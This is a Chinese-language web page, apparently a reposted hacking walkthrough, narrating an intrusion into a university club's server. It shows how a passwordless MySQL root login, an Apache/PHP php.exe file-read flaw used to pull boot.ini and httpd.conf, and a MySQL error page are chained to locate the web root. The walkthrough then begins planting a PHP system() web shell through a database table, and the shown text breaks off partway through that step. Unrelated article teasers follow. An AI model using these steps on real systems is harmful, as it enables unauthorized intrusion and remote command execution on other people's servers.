看紧你的3306端口一次通过mysql的入侵

2016-01-29 16:36 15 1 收藏

看紧你的3306端口一次通过mysql的入侵,看紧你的3306端口，一次通过mysql的入侵

【 tulaoshi.com - SQLServer 】

用superscan扫了一下
某个c类的网段，寻找开放80端口的机器，结果就只有一台机器
开放了80端口，试着连了一下，是我们学校某个社团的的主页。
从端口的banner来看应该是apache（win32）,证实一下
telnet 211.87.xxx.xxx
get（回车）
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"
<HTML<HEAD
<TITLE501 Method
Not Implemented</TITLE
</HEAD<BODY
<H1Method Not Implemented</H1
get to /index
.html not supported.<P
Invalid method in request get<P
<HR
<ADDRESSApache/1.3.2
2 Server at www.xxxxxx.com Port 80</ADDRESS
</BODY</HTML

遗失对主机的连接。
C:
呵呵，这下看得更清楚了

据我猜测，应该是"apache+mysql+php"的黄金组合吧
习惯性的mysql -h 211.87.xxx.xxx
果然连上了
Welcome to the MySQL monitor. Commands end with or g.
Your MySQL connection id is 17 to server version: 3.23.53-max-nt

Type help; or h for help. Type c to clear the buffer.

mysql

断开试着
mysql -h 211.87.xxx.xxx -u root -p
password:
Welcome to the MySQL monitor. Commands end with or g.
Your MySQL connection id is 18 to server version: 3.23.53-max-nt

Type help; or h for help. Type c to clear the buffer.

mysql
呵呵，大家看到了他的root用户没有密码，这是我今天要说的第一个主题。
这是相当的危险的，碰见这种情况，有99.999%的可能可以进入
既然使用的apache+php，只要找到他在本地存放的web的物理路径就为所欲为了
呵呵
下一个问题是我今天要说的重点怎么样才能知道那台主机的存放的web的物理路径？
方法有很多种，在这里我介绍2种方法供初学者参考
首先要告诉大家的是低版本的apache+php有一个漏洞
提http://xxx.xxxx.xxx.xxx/php/php.exe?对方的物理文件名
就可以把那个物理文件下载下来。

于是提http://211.87.xxx.xxx/php/php.exe?c:a.txt
返回
No input file specified. （没有这个漏洞的话提示找不到网页）
好的，这说明他有这个漏洞。
在提http://211.87.xxx.xxx/php/php.exe?c:boot.ini
返回
[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS [operating

systems] multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Microsoft Windows XP Professional"

/fastdetect
呵呵，装的还是xp。
好了，我们可以猜测对方apache的conf文件的物理位置了
http://211.87.xxx.xxx/php/php.exe?c:apacheconfhttpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?d:apacheconfhttpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?e:apacheconfhttpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?c:Program Filesapacheconfhttpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?f:apacheconfhttpd.conf
猜到了，返回了好多东西
找到我们想要的
# DocumentRoot: The directory out of which you will serve your
# documents. By default, all requests are taken from this directory, but
# symbolic links and aliases may be used to point to other locations.
#
DocumentRoot "D:homepage"
看得出来对方的主目录是D:homepage
下面的事就好办了，现在就想得到shell?
先别急，我们先来看看另一种方法
那就是利用mysql的错误
随便的浏览一下他的网页找到一处利用mysql的地方
http://211.87.xxx.xxx/skonline/study/list.php?id=14

长得太帅了，哈哈哈哈
提交
http://211.87.xxx.xxx/skonline/study/list.php?id=14
返回
Warning: Supplied argument is not a valid MySQL result resource in

d:homepageskonlinestudylist.php on line 231
呵呵，一览无余。
然后，然后就是制造我们的shell
mysql -h 211.87.xxx.xxx -u root -p
password:
Welcome to the MySQL monitor. Commands end with or g.
Your MySQL connection id is 18 to server version: 3.23.53-max-nt

Type help; or h for help. Type c to clear the buffer.

mysql use test;
Database changed
mysql create table t(cmd text);
Query OK, 0 rows affected (0.08 sec)

mysql insert into t values(<?system($c);?);
Query OK, 1 row aff

来源:https://www.tulaoshi.com/n/20160129/1499069.html

上一篇： SQL注入实战---利用“dbo”获得SQL管理权限和系统权限
下一篇：《天天酷跑》WPE刷分攻略

看过《看紧你的3306端口一次通过mysql的入侵》的人还看了以下文章更多>>

奶嘴多久换一次宝宝奶嘴多久换一次

标签：奶嘴安抚奶嘴

奶嘴多久换一次奶嘴一般情况下二至三个月需更换一次，每次给宝宝使用奶嘴时记得用开水消毒，这样可以防止细菌滋生，保证宝宝的健康。奶嘴的使用寿命奶嘴的使用寿命根据种类的不同也存在一定的差别，硅胶奶嘴的使用寿命一般在两个月左右，橡胶奶嘴是以纯天然橡胶为材料制作而成的，乳头十分接近，一般情况下使用3-4周就需要更...

思科交换机怎么在VLAN中一次添加多个端口？

思科交换机怎么在VLAN中一次添加多个端口？思科交换机在VLAN中如何一次添加多个端口，这个在我们平时配置的过程中经常需要用到，因为如果一个一个的添加端口，工作量将会很大，所以需要一次性添加多个端口，下面由小编介绍下具体操作吧 1、首先通过CONSOLO口或telnet连接交换机，进入用户模式"，如图所示： 2、...

“心”对不起了,让你一次次纠结、痛.

标签：电脑入门

“心”对不起了,让你一次次纠结、痛. 分手不能怪她是我没有让她爱上我的全部。不去想别的,只要一直记得她的好,就不会不安. 因为只爱你、所以不想在找到更好的了. 小伙er'内谁老内谁说,爱伱≥爱Tā自己ヘ我在最深的黑夜仰望白昼,等待着那迟到的光芒关上与你的对白,眼泪不知不觉的流下来。由暧昧到仇视,其中事态变迁也不过数日而已 ...

头发多久洗一次最好头发多久洗一次好

标签：头发洗头

1.头发多久洗一次最好每个人的发质不一样，所以洗头发的次数也不能一概而论。 2.油性头发多久洗一次头发过油是挺闹心的，一天不洗就感觉油油的很不舒服，所以很多油性发质的人群几乎隔一两天就要洗一次头，有的甚至天天洗。正确的洗法应该是一到三天洗一次，因为头发和头皮有保护膜，洗的太频繁也会伤害头发毛囊，所以一到...

桃子一次吃多少合适桃子一次吃多少好

标签：桃子桃子吃多少合适桃子一次吃多少好

桃子一次吃多少合适桃子一次吃3个左右。桃养身归养身,有些人吃多了胃会受不了，但毕竟是因人而异,有的人吃两三个就不行了,有的人可以吃很多。自己的情况还是自己观察,试一下比较好。桃“养人”主要是因为它的营养丰富,尤其是含铁量很高,常吃能够起到防治贫血的作用,里面的果胶还可以预防便秘。中医认为,吃桃能够治疗肺病,主要是因为它属于...

查看更多精彩>>